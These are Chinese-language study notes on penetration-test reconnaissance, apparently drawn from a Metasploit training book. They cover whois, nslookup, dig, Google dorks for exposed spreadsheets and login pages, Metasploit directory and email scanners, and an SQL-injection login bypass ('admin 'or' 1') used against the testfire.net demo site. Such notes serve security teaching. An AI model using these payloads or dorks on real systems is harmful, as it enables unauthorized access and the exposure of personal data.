whois域名注册信息查询
whois testfire.net
nslookup域名查询
nslookup
set type=A // 注意type后面不能有空格,对IP地址解析
testfire.net
exit
set type=MX //查找邮件转发服务器
dig域名查询
dig @<DNS服务器> <待查询的域名>
DNS服务器可通过whois得到
dig比nslookup得到的结果更权威
dig @dns.baidu.com baidu.com
IP2Location地理位置查询
http://ip.chinaz.com
国内ip地址查询:http://www.cz88.net
netcraft查询详细信息
查询www.baidu.com的详细信息
http://toolbar.netcraft.com/site_report?url=http://www.baidu.com
Google Hacking
GHDB搜索字符串
exploit-db.com/exploits/google-dorks
网络目录结构
parent directory site testfire.net
特定类型的文件
学生信息 filetype:xls
site:firetest.net filetype:xls
易存在sql注入的页面
site:testfire.net inurl:login
检测sql注入
name: test'
password: test'
可以看到对输入没有过滤,重新输入
name: admin 'or' 1
password: test 'or' 1
成功登入后台
Metasploit搜索网站目录
service postgresql start
msfsconsole
search brute_dirs
use auxiliary/scanner/http/dir_scanner
show options
set threads 50
set rhosts www.testfire.net
exploit
Metasploit搜索网站中的email地址
use auxiliary/gather/search_email_collector
set domain altoromutual.com
run
路由侦察
traceroute www.baidu.com
参考
《Metasploit渗透魔鬼训练营》